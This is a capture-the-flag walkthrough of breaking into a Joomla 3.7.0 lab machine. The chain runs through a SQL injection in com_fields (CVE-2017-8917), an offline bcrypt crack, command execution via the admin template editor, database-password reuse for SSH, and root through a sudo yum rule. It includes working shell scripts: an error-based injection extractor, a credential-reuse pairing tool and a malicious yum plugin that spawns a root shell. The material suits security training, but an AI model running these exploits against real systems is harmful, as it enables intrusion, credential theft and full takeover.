Joomla! is an open-source content management system (CMS) used to build and publish web applications such as forums, user communities, e-commerce sites and many others.
In this tutorial I dive into Joomla! version 3.7.0, which fails to sanitise a list-ordering parameter in one of its components and is therefore vulnerable to SQL injection (CVE-2017-8917). Enumerating the database through that injection turns up a username and a password hash, and the hash is cracked offline. The username and cracked password then log me into the Joomla administrator page.
Once inside the administrator page, further enumeration shows that an administrator can edit a template's index.php from the browser. Because the template is server-side PHP, any command placed in that file runs on the web server and its output is rendered on the page. That gives a foothold from which to enumerate the underlying Linux host: users, file permissions, the Joomla configuration file and so on. The database password found in that configuration file turns out to be reused for a local user, which gives SSH access, and from there a weak sudo rule allows privilege escalation to root. Let's get to it.
This proof of concept was made possible by TryHackMe. We begin with an Nmap scan to discover open ports and the service versions behind them. Below we see that port 22 (SSH) and port 80 (HTTP) are open, telling us this host is serving a website, and that port 3306 is open, which is MySQL.
Because port 80 is open, the host can be browsed with any web browser. While clicking through the visible pages and looking for anything that stood out, I also ran a directory scan against the site. A directory scan locates pages that are not linked from the visible site. I didn't find anything unusual browsing manually, but the directory scan did locate an administrator login page.
Visiting http://10.10.37.2/administrator/ brings up the Joomla administrator login form.
At this point no login credentials are known, but there is information to leverage. The earlier Nmap scan found a MySQL database running on this host, so I enumerated that service a little further.
Nmap's service scripts did not turn up anything beyond what was already known, so I launched Metasploit and searched it for anything related to Joomla. One result, the auxiliary/scanner/http/joomla_version module, reports the version a Joomla site is running.
Running the version scanner shows that the site is on Joomla 3.7.0. With the version known, the next step is to search for known vulnerabilities in that release. A few pages in, it is clear that this version fails to sanitise the list[fullordering] parameter of the com_fields component, which makes it vulnerable to SQL injection (CVE-2017-8917). One of the pages I found gives the exact syntax to use; all I needed to change was the target IP. A useful sanity check before trusting any version scanner: Joomla 3.x also states its version in administrator/manifests/files/joomla.xml, which is normally readable without authentication.
Sure enough, the syntax worked and I was able to list the databases on this server.
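To show what the injection actually does under the hood, here is an added example that is not part of the original write-up or of any tool it used: a hand-rolled, error-based extraction for the com_fields injection. The list[fullordering] value lands in an ORDER BY clause, so an updatexml() call with an invalid XPath makes MySQL echo an attacker-chosen subquery result inside its error message. The target URL is taken from the write-up; the HTTP response is a constructed sample so the parsing can run offline, and leak_from_target (which needs curl and network) is the only assumed live call.

```shell
#!/bin/sh
# Added example (not from the original write-up): error-based extraction for
# the Joomla 3.7.0 com_fields SQL injection (CVE-2017-8917). The unsanitized
# list[fullordering] parameter is placed in an ORDER BY clause, so updatexml()
# with an invalid XPath makes MySQL echo a subquery result in its error text.

TARGET="http://10.10.37.2"   # host from the write-up; change for other targets

# Build the full injection URL for a given subquery (e.g. 'select database()').
# concat(1, ...) forces the leaked value to start with "1" so it never parses
# as valid XPath; only characters that break a query string are percent-encoded.
joomla_fields_url() {
  subquery="$1"
  payload="updatexml(0x23,concat(1,($subquery)),1)"
  encoded=$(printf '%s' "$payload" | sed -e 's/%/%25/g' -e 's/ /%20/g' \
            -e "s/'/%27/g" -e 's/#/%23/g' -e 's/&/%26/g')
  printf '%s/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=%s\n' \
    "$TARGET" "$encoded"
}

# Pull the leaked value out of an HTTP response body read from stdin.
# MySQL reports: XPATH syntax error: '1<value>'  -- strip the leading "1".
extract_leak() {
  sed -n "s/.*XPATH syntax error: '1\([^']*\)'.*/\1/p" | head -n 1
}

# Constructed response, shaped like the Joomla error page a target returns for
# the database() subquery; it was not captured from a live host.
sample_response() {
  cat <<'EOF'
<!DOCTYPE html><html><body>
<h1>500 - An error has occurred.</h1>
<p>XPATH syntax error: '1joomla' SQL=SELECT ... ORDER BY updatexml(0x23,concat(1,(select database())),1)</p>
</body></html>
EOF
}

# Live use (assumed: curl installed, network to the target; not run here).
leak_from_target() {
  curl -s "$(joomla_fields_url "$1")" | extract_leak
}

sample_response | extract_leak            # prints: joomla
joomla_fields_url 'select database()'     # prints the URL to request
```

The XPATH error message only carries the first 32 characters of the value, so a 60-character bcrypt hash has to be pulled out in pieces by wrapping the column in substr() and stepping the offset. sqlmap automates the whole exchange when pointed at the same URL with -p list[fullordering], which is what the pages found online describe.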
Now that I have databases to work with, I can dig into the tables and rows of each one. Below I list the tables in the joomla database.
That returns a long list of tables, but we are after low-hanging fruit, so I chose the table whose name ends in _users (Joomla prefixes every table name with a per-installation prefix).
With a table chosen, I can dump its contents. This is where a username and a password hash turn up.
The username Jonah and his password hash are recovered.
This hash can be copied out and cracked offline, but before doing so it is important to identify the hash type. My favourite reference for that is the hashcat wiki's example_hashes page (https://hashcat.net/wiki/doku.php?id=example_hashes), which lists a sample of every format hashcat supports next to its mode number. The Joomla hash starts with $2y$, the prefix of bcrypt as produced by PHP's password_hash(); Joomla 3.2 and later store user passwords this way.
Once the hash type is known, the next step is to crack it. I used John the Ripper, and John has to be told which format the hash is in. With identification already done, all that remained was the name John uses for that format, which the command below lists (John can print every format name it supports).
hashcat.net identifies the hash as bcrypt (Blowfish-based crypt, hashcat mode 3200), and according to the output above John calls that format bcrypt, so that is what I specified when cracking. Two caveats worth knowing: the $2y$ and $2a$ prefixes are handled by the same bcrypt format, and bcrypt is deliberately slow (PHP's default cost of 10 means 2^10 rounds of key setup per guess), so a large wordlist takes a long time; start with a small one.
The password cracked, so I now have a username and password. The next step is finding a login that accepts them. Recalling that the Nmap scan showed port 22 open, I tried SSH first, without success. The Joomla administrator page, however, accepted the credentials.
After signing in I browsed around to get familiar with the back end and eventually found a template that describes itself as being built on Bootstrap. This isn't the bootstrapping a computer does at start-up; Bootstrap is a front-end CSS and JavaScript framework that templates use to get a consistent, responsive layout quickly. Best practices, ironic. The template itself is not vulnerable; the issue is that the administrator role can edit its PHP source from the browser, which is code execution by design. Let's use it.
The template editor lets an administrator edit the template's index.php. Since that file is executed as PHP on the server, a PHP call that runs a shell command can be inserted into it. Once the template is saved and a visitor requests the site, the command runs as the web server user and its output is rendered in the page. One caveat: the edit is written to disk and served to every visitor, so it persists until reverted; on a real engagement keep the change minimal and restore the original file afterwards.
The highlighted section above runs the ls -al command. The screenshot below shows its output on the web page once the template is saved and the home page is reloaded.
I found this quite fun, so I tried some other commands to see what would happen and to gather more information. In the example below I ran whoami to learn which user executes the commands and pwd to learn the current directory on the underlying operating system.
Below is the output. The commands run as the apache service account, from the directory /var/www/html, which is the web root.
Continuing this way, I read /etc/passwd and discovered a local user.
The result of that command shows that Jonah Jameson's account is jjameson.
I tried this username with the password already cracked, over SSH and on the other login portals, without success, so I kept looking for a password that works for this account.
Reading up online, I learned that Joomla keeps its settings, including file paths, the database connection and the database password, in a file called configuration.php in the root of the Joomla installation (here /var/www/html). With luck, that file holds a password.
Reading the configuration file with the command above produces the output below: the public $password property holds the database password in clear text. Because the web server needs that value to reach MySQL, it has to be stored in a recoverable form, which is exactly why it is worth trying against every other login on the host.
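The two files read through the template injection (configuration.php and /etc/passwd) are small enough to triage by hand, but the following added example, which is mine and not part of the original write-up, scripts that triage: it pulls the database credentials out of a Joomla configuration.php, lists the accounts in passwd that have a real login shell, and pairs them for a credential-reuse check. Both input files are constructed samples (the password, site name and table prefix are made up) so the script runs offline; on a target, point the functions at the real files.

```shell
#!/bin/sh
# Added example (not from the original write-up): triage of the two files the
# write-up reads through the template command injection. The sample copies
# below are constructed so the functions run offline; on the target, pass the
# real paths (the Joomla root's configuration.php and /etc/passwd).

# Print host/user/password/db/dbprefix from a Joomla configuration.php.
# Joomla stores them as PHP class properties: public $password = '...';
joomla_db_creds() {
  grep -E '^[[:space:]]*public \$(host|user|password|db|dbprefix) ' "$1" |
    sed -E "s/^[[:space:]]*public .([a-z]+)[[:space:]]*=[[:space:]]*'([^']*)';.*/\1=\2/"
}

# List accounts that can actually log in (a real shell, not nologin/false),
# as name:uid:home.
login_users() {
  awk -F: '$7 !~ /(nologin|false)$/ { print $1 ":" $3 ":" $6 }' "$1"
}

# Pair every login-capable account with the database password, ready to be
# tried against SSH: credential reuse is exactly what the write-up finds.
reuse_candidates() {
  dir="$1"
  pw=$(joomla_db_creds "$dir/configuration.php" | sed -n 's/^password=//p')
  login_users "$dir/passwd" | cut -d: -f1 | while read -r u; do
    printf '%s:%s\n' "$u" "$pw"
  done
}

# Write constructed copies of both files into a temp dir and print its path.
write_samples() {
  d=$(mktemp -d)
  cat >"$d/configuration.php" <<'EOF'
<?php
class JConfig {
	public $offline = '0';
	public $sitename = 'Example Site';
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'root';
	public $password = 'ConstructedPassword1';
	public $db = 'joomla';
	public $dbprefix = 'jos_';
	public $secret = 'notarealsecret';
}
EOF
  cat >"$d/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
jjameson:x:1000:1000:Jonah Jameson:/home/jjameson:/bin/bash
EOF
  printf '%s\n' "$d"
}

samples=$(write_samples)
joomla_db_creds "$samples/configuration.php"   # host=localhost ... password=ConstructedPassword1
login_users "$samples/passwd"                  # root and jjameson only
reuse_candidates "$samples"                    # root:ConstructedPassword1, jjameson:ConstructedPassword1
```

The reuse_candidates output is in the user:password form that hydra accepts through its -C option, or it can be walked with a loop of ssh attempts; with two login-capable accounts the manual check the write-up did is just as quick.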
SSH with jjameson and the newly discovered password succeeded. The next few screenshots show the commands I ran right away to learn more about the system.
The command below locates any file with a .txt extension.
It pointed straight at the user flag.
The next screenshot shows the current directory and its permissions. I was already in the /home directory, and user.txt was sitting there.
With user access confirmed, it was time to enumerate further for places where privilege escalation might be possible. sudo -l shows that this account may run yum as root through sudo with NOPASSWD, so no password prompt will appear.
Whenever I see a rule like that, my first stop is GTFOBins (https://gtfobins.github.io/), which catalogues Unix binaries that can be abused to escalate privileges when they are allowed through sudo, setuid or similar, with the exact syntax for each.
Sure enough there is an entry for yum, and the first step is creating a file to hold the script.
Next I copied the entire example from GTFOBins, pasted it into the file and saved it.
Then chmod to make the file executable, followed by ls -al to verify the mode changed.
The final step is to run the file and watch it load. The exploit worked as planned: yum started through sudo without a password prompt, and the shell it spawned inherited root. A quick whoami confirms that the shell is running as root, with access to the entire system.
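To make the escalation reproducible rather than a pasted blob, here is an added example of my own (not the original write-up's script and not copied from GTFOBins) split into a check and an exploit builder. The exploit follows the GTFOBins sudo technique for yum that loads an attacker-supplied plugin; yum honours an alternate config file with -c, and a config that sets plugins=1 plus a pluginpath makes it import any <name>.py from that directory whose <name>.conf is enabled. The sudo -l output is a constructed sample, and the final sudo yum command is printed rather than executed, since it is only meaningful on a host with that rule.

```shell
#!/bin/sh
# Added example (not from the original write-up): the sudo-yum escalation
# path as a check plus an exploit builder. The plugin approach follows the
# GTFOBins "yum" sudo entry; the file contents here are this example's own.

# Read `sudo -l` output on stdin and print each binary runnable with NOPASSWD.
nopasswd_binaries() {
  sed -n 's/.*NOPASSWD:[[:space:]]*//p' | tr ',' '\n' | sed 's/^[[:space:]]*//; /^$/d'
}

# Constructed `sudo -l` output, shaped like the write-up's finding.
sample_sudo_l() {
  cat <<'EOF'
Matching Defaults entries for jjameson on target:
    !visiblepw, always_set_home, env_reset
User jjameson may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/yum
EOF
}

# Write a throwaway yum config plus a plugin whose init_hook execs a shell,
# then print the directory. yum loads <name>.py from pluginpath when
# plugins=1 and the matching <name>.conf is enabled.
build_yum_plugin() {
  TF=$(mktemp -d)
  cat >"$TF/x" <<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
  cat >"$TF/y.conf" <<'EOF'
[main]
enabled=1
EOF
  cat >"$TF/y.py" <<'EOF'
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version = '2.1'
def init_hook(conduit):
    os.execl('/bin/sh', '/bin/sh')
EOF
  printf '%s\n' "$TF"
}

# The command that turns the plugin into a root shell. It is printed here,
# not executed; run it only on a host whose sudo -l shows yum with NOPASSWD.
yum_root_shell_cmd() {
  printf 'sudo yum -c %s/x --enableplugin=y\n' "$1"
}

if sample_sudo_l | nopasswd_binaries | grep -q '/yum$'; then
  TF=$(build_yum_plugin)
  yum_root_shell_cmd "$TF"
fi
```

Because the plugin's init_hook replaces the yum process with /bin/sh, the shell runs with the root identity sudo gave yum, which is the "retained the privileges" behaviour seen above. This relies on the classic Python yum found on CentOS 7 era systems; the dnf-based yum shim on newer releases loads plugins differently, so check which binary /usr/bin/yum really is before relying on the plugin route.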
With the shell running as root, changing into the root home directory is now permitted.
Changing into the root home directory worked and yielded the root flag.